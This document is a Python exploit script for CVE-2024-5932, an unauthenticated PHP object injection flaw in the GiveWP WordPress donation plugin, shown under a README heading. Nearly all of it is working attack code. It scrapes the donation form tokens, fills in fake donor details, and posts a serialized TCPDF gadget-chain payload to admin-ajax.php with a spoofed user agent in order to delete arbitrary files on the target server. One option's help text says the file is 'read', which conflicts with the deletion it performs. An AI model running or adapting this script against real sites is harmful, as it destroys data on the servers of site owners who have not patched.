README.md
Rendering markdown...
import requests
from bs4 import BeautifulSoup
from faker import Faker
from urllib.parse import urlparse
import random
import hashlib
import time
import sys
import re
import rich_click as click
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
banner = r"""
..-+*******-
.=#+-------=@. .:==:.
.**-------=*+: .-=++.-+=:.
+*-------=#=+++++++++=:.. -+:==**=+-+:.
.%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=..
:%--**+-::::::::::::::::::::+*=: .::*=**=:.
..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:.
..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-.
.-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:..
..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=.
.=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%-
.*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%-
.+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%-
.+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%-
.=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#-
.=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#-
.-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*:
:+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*.
.-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+.
.::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-.
%+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%.
*+.......+*::::::::::::::::-****-:::::=*=:.++:*=
.%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#.
++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=.
:#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-..
.++....-#:::%. .-*+-..*=.+@= .=+..-#
.:+++#@#-:-#= ... .-++:-%@@= .:#
:+++**##@#+=. -%@@@%- .-=*#.
.=+::+::-@: #@@@@+. :+*=::=*-
.=+:-**+%%+=-:.. =*#*-..=*-:::::=*
:++---::--=*#+*+++++**+*+**-::::::+=
.+*=:::---+*:::::++++++*+=:::::-*=.
.:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team)
..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2024-5932
Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
=============================================================================================================
CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Arbitrary File Deletion
=============================================================================================================
"""
class GiveWPExploit:
def __init__(self, url: str, file: str):
self.url = url
self.file = file
def greeting() -> None:
print(banner)
def spinner(duration=10, interval=0.1) -> None:
spinner_chars = ['|', '/', '-', '\\']
end_time = time.time() + duration
while time.time() < end_time:
for char in spinner_chars:
sys.stdout.write(f'\r[{char}] Exploit loading, please wait...')
sys.stdout.flush()
time.sleep(interval)
print("")
def getBaseUrl(self, url):
parsed_url = urlparse(url)
base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
return base_url
def getParams(self) -> dict:
response = requests.get(self.url)
soup = BeautifulSoup(response.text, 'html.parser')
give_form_id = soup.find('input', {'name': 'give-form-id'})['value']
give_form_hash = soup.find('input', {'name': 'give-form-hash'})['value']
button_tag = soup.find('button', {'data-price-id': True})
give_price_id = button_tag['data-price-id']
give_amount = button_tag.get_text(strip=True)
# Fake Userinfo
fake = Faker()
params = {"give-form-id" : give_form_id,
"give-form-hash" : give_form_hash,
"give-price-id" : give_price_id,
"give-amount" : give_amount,
"give_first": fake.first_name(),
"give_last": fake.last_name(),
"give_email": fake.email(),}
return params
def getData(self) -> dict:
file = self.file
rand_md5 = hashlib.md5(str(random.randint(0, 10)).encode()).hexdigest()
# Payload
payload = 'O:5:"TCPDF":2:{s:12:"\\0*\\0imagekeys";a:1:{i:0;s:%d:"%s";}s:10:"\\0*\\0file_id";s:32:"%s";}' % (len(file), file, rand_md5)
data = self.getParams()
data['give_title'] = payload
data['give-gateway'] = 'offline'
data['action'] = 'give_process_donation'
print(f"[+] Request Data: ")
print(data)
return data
def isEmbed(self, url: str) -> str:
pattern = r'<iframe[\s\S]*?\bname="give-embed-form"[\s\S]*?>'
response = requests.get(url)
match = re.search(pattern, response.text)
if match:
soup1 = BeautifulSoup(response.text, 'html.parser')
embed_url = soup1.find('iframe')['src']
return embed_url
else:
return url
def sendRequest(self) -> None:
# Fake User_Agent
fake = Faker()
baseUrl = self.getBaseUrl(self.url)
reqUrl = f"{baseUrl}/wp-admin/admin-ajax.php"
data = self.getData()
headers = {
'User-Agent': fake.user_agent(),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding': 'gzip, deflate, br'
}
response = requests.post(reqUrl, data=data, headers=headers)
def exploit(self) -> None:
self.url = self.isEmbed(self.url)
self.sendRequest()
# argument parsing with rich_click
@click.command()
@click.option(
"-u",
"--url",
required=True,
help="Specify a URL or domain for vulnerability detection (Donation-Form Page)",
)
@click.option(
"-f",
"--file",
default="/tmp/test",
help="Specify the file to read from the server",
)
def main(url: str, file: str) -> None:
cve_exploit = GiveWPExploit(url, file)
GiveWPExploit.greeting()
GiveWPExploit.spinner(duration=1)
cve_exploit.exploit()
if __name__ == "__main__":
main()